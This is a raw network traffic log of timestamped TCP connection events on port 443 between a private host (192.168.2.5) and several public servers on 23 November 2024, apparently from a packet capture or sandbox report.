                                                                                                                                                                                          Nov 23, 2024 17:44:47.265065908 CET49785443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:47.265167952 CET49785443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:47.265182018 CET4434978513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:47.379229069 CET4434977713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:47.379399061 CET4434977713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:47.379642010 CET49777443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:47.379735947 CET49777443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:47.379735947 CET49777443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:47.379796982 CET4434977713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:47.379903078 CET4434977713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:47.382287979 CET49788443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:47.382318020 CET4434978813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:47.383289099 CET49788443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:47.383460045 CET49788443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:47.383475065 CET4434978813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:47.568104029 CET4434977813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:47.568274975 CET4434977813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:47.569698095 CET49778443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:47.569727898 CET49778443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:47.569736958 CET4434977813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:47.569753885 CET49778443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:47.569760084 CET4434977813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:47.572535038 CET49789443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:47.572576046 CET4434978913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:47.572791100 CET49789443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:47.572947979 CET49789443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:47.572964907 CET4434978913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:48.553181887 CET49703443192.168.2.523.1.237.91
                                                                                                                                                                                          Nov 23, 2024 17:44:48.553333998 CET49703443192.168.2.523.1.237.91
                                                                                                                                                                                          Nov 23, 2024 17:44:48.553723097 CET49790443192.168.2.523.1.237.91
                                                                                                                                                                                          Nov 23, 2024 17:44:48.553776979 CET4434979023.1.237.91192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:48.553854942 CET49790443192.168.2.523.1.237.91
                                                                                                                                                                                          Nov 23, 2024 17:44:48.554145098 CET49790443192.168.2.523.1.237.91
                                                                                                                                                                                          Nov 23, 2024 17:44:48.554169893 CET4434979023.1.237.91192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:48.598583937 CET44349781216.58.208.228192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:48.598929882 CET49781443192.168.2.5216.58.208.228
                                                                                                                                                                                          Nov 23, 2024 17:44:48.598947048 CET44349781216.58.208.228192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:48.600603104 CET44349781216.58.208.228192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:48.600687027 CET49781443192.168.2.5216.58.208.228
                                                                                                                                                                                          Nov 23, 2024 17:44:48.601726055 CET49781443192.168.2.5216.58.208.228
                                                                                                                                                                                          Nov 23, 2024 17:44:48.601809978 CET44349781216.58.208.228192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:48.618839025 CET49791443192.168.2.52.18.109.164
                                                                                                                                                                                          Nov 23, 2024 17:44:48.618890047 CET443497912.18.109.164192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:48.619036913 CET49791443192.168.2.52.18.109.164
                                                                                                                                                                                          Nov 23, 2024 17:44:48.620228052 CET49791443192.168.2.52.18.109.164
                                                                                                                                                                                          Nov 23, 2024 17:44:48.620251894 CET443497912.18.109.164192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:48.695034027 CET49781443192.168.2.5216.58.208.228
                                                                                                                                                                                          Nov 23, 2024 17:44:48.695064068 CET44349781216.58.208.228192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:48.725452900 CET4434970323.1.237.91192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:48.725497007 CET4434970323.1.237.91192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:48.797739983 CET49781443192.168.2.5216.58.208.228
                                                                                                                                                                                          Nov 23, 2024 17:44:49.031645060 CET4434978513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.033380032 CET49785443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.033416986 CET4434978513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.034056902 CET49785443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.034063101 CET4434978513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.201028109 CET4434978413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.201683044 CET49784443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.201710939 CET4434978413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.202172041 CET49784443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.202188015 CET4434978413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.207854033 CET4434978813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.208374023 CET49788443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.208403111 CET4434978813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.209172010 CET49788443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.209177971 CET4434978813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.211611986 CET4434978313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.212920904 CET49783443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.212948084 CET4434978313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.213469982 CET49783443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.213475943 CET4434978313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.455647945 CET4434978913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.456190109 CET49789443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.456213951 CET4434978913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.456795931 CET49789443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.456800938 CET4434978913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.767076969 CET4434978513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.767144918 CET4434978513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.767224073 CET49785443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.790472031 CET49785443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.790494919 CET4434978513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.790512085 CET49785443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.790520906 CET4434978513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.793695927 CET49792443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.793740034 CET4434979213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.793838978 CET49792443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.794255972 CET49792443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.794272900 CET4434979213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.881736040 CET4434978413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.881813049 CET4434978413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.881921053 CET49784443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.888509035 CET4434978813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.888592005 CET4434978813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.888663054 CET49788443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.895632982 CET4434978313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.895706892 CET4434978313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.895876884 CET49783443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.923814058 CET4434978913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.923971891 CET4434978913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.924065113 CET49789443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.969350100 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.969389915 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.969508886 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.970632076 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.970648050 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.972418070 CET49784443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.972428083 CET4434978413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.972475052 CET49784443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.972480059 CET4434978413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.973270893 CET49789443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.973284960 CET4434978913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.973301888 CET49789443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.973309994 CET4434978913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.973908901 CET49788443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.973926067 CET4434978813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.973937035 CET49788443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.973943949 CET4434978813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.976058960 CET49783443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.976077080 CET4434978313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.976108074 CET49783443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.976114988 CET4434978313.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.987823009 CET49797443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.987833977 CET4434979713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.987890005 CET49797443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.989155054 CET49797443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.989167929 CET4434979713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.992418051 CET49798443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.992446899 CET4434979813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.992559910 CET49798443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.992682934 CET49798443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.992696047 CET4434979813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.993503094 CET49799443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.993513107 CET4434979913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.993614912 CET49799443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.994605064 CET49800443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.994628906 CET4434980013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.994685888 CET49800443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.994877100 CET49799443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.994889021 CET4434979913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:49.995053053 CET49800443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:49.995064020 CET4434980013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:50.019140959 CET4434979023.1.237.91192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:50.019227982 CET49790443192.168.2.523.1.237.91
                                                                                                                                                                                          Nov 23, 2024 17:44:50.040340900 CET443497912.18.109.164192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:50.040411949 CET49791443192.168.2.52.18.109.164
                                                                                                                                                                                          Nov 23, 2024 17:44:50.042440891 CET49791443192.168.2.52.18.109.164
                                                                                                                                                                                          Nov 23, 2024 17:44:50.042448997 CET443497912.18.109.164192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:50.042954922 CET443497912.18.109.164192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:50.091253996 CET49791443192.168.2.52.18.109.164
                                                                                                                                                                                          Nov 23, 2024 17:44:50.131335020 CET443497912.18.109.164192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:50.365582943 CET49801443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:50.365638971 CET4434980113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:50.365931988 CET49801443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:50.366177082 CET49801443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:50.366189957 CET4434980113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:50.578558922 CET443497912.18.109.164192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:50.578630924 CET443497912.18.109.164192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:50.578701019 CET49791443192.168.2.52.18.109.164
                                                                                                                                                                                          Nov 23, 2024 17:44:50.582153082 CET49791443192.168.2.52.18.109.164
                                                                                                                                                                                          Nov 23, 2024 17:44:50.582175016 CET443497912.18.109.164192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:50.582190037 CET49791443192.168.2.52.18.109.164
                                                                                                                                                                                          Nov 23, 2024 17:44:50.582197905 CET443497912.18.109.164192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:50.637886047 CET49802443192.168.2.52.18.109.164
                                                                                                                                                                                          Nov 23, 2024 17:44:50.637934923 CET443498022.18.109.164192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:50.638005018 CET49802443192.168.2.52.18.109.164
                                                                                                                                                                                          Nov 23, 2024 17:44:50.643280983 CET49802443192.168.2.52.18.109.164
                                                                                                                                                                                          Nov 23, 2024 17:44:50.643306017 CET443498022.18.109.164192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:51.709590912 CET4434979213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:51.710247993 CET49792443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:51.710270882 CET4434979213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:51.710882902 CET49792443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:51.710892916 CET4434979213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:51.758192062 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:51.758497953 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:51.758510113 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:51.759939909 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:51.760004044 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:51.761075020 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:51.761202097 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:51.761327028 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:51.761334896 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:51.840868950 CET4434980013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:51.841495991 CET49800443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:51.841523886 CET4434980013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:51.842209101 CET49800443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:51.842215061 CET4434980013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:51.842650890 CET4434979713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:51.843231916 CET49797443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:51.843250036 CET4434979713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:51.843781948 CET49797443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:51.843786955 CET4434979713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:51.894309998 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:51.899498940 CET4434979913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:51.899529934 CET4434979813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:51.900182009 CET49799443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:51.900196075 CET4434979913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:51.900221109 CET49798443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:51.900253057 CET4434979813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:51.900736094 CET49799443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:51.900741100 CET4434979913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:51.900921106 CET49798443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:51.900927067 CET4434979813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.099487066 CET443498022.18.109.164192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.099570036 CET49802443192.168.2.52.18.109.164
                                                                                                                                                                                          Nov 23, 2024 17:44:52.101063967 CET49802443192.168.2.52.18.109.164
                                                                                                                                                                                          Nov 23, 2024 17:44:52.101075888 CET443498022.18.109.164192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.101309061 CET443498022.18.109.164192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.102410078 CET49802443192.168.2.52.18.109.164
                                                                                                                                                                                          Nov 23, 2024 17:44:52.143335104 CET443498022.18.109.164192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.167567015 CET4434979213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.167650938 CET4434979213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.167704105 CET49792443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.167962074 CET49792443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.167980909 CET4434979213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.167994022 CET49792443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.168000937 CET4434979213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.172470093 CET49804443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.172517061 CET4434980413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.172590017 CET49804443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.174978971 CET49804443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.174995899 CET4434980413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.280227900 CET4434980013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.280297041 CET4434980013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.280354977 CET49800443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.280926943 CET49800443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.280946970 CET4434980013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.280966997 CET49800443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.280972004 CET4434980013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.283119917 CET4434979713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.283210039 CET4434979713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.283356905 CET49797443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.284337997 CET49797443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.284353018 CET4434979713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.284365892 CET49797443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.284372091 CET4434979713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.286298037 CET49805443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.286346912 CET4434980513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.286564112 CET49805443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.287846088 CET49806443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.287885904 CET4434980613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.288090944 CET49806443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.288094044 CET49805443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.288122892 CET4434980513.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.288182974 CET49806443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.288192987 CET4434980613.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.296835899 CET4434980113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.297702074 CET49801443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.297725916 CET4434980113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.299220085 CET4434980113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.299293041 CET49801443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.300318956 CET49801443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.300400972 CET4434980113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.300546885 CET49801443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.300554991 CET4434980113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.331947088 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.332000017 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.332014084 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.332034111 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.332042933 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.332048893 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.332068920 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.332082987 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.332091093 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.332124949 CET49794443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.343646049 CET49801443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.354018927 CET4434979913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.354207039 CET4434979913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.354902029 CET49799443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.354902029 CET49799443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.354927063 CET49799443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.354935884 CET4434979913.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.360754967 CET49807443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.360800028 CET4434980713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.361192942 CET49807443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.361608982 CET49807443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.361632109 CET4434980713.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.367573023 CET4434979813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.367652893 CET4434979813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.367858887 CET49798443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.368058920 CET49798443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.368093967 CET4434979813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.368112087 CET49798443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.368122101 CET4434979813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.370553017 CET49808443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.370621920 CET4434980813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.370702028 CET49808443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.370821953 CET49808443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:52.370852947 CET4434980813.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.508095980 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.508111954 CET4434979413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:52.508138895 CET4434979413.107.246.63192.168.2.5
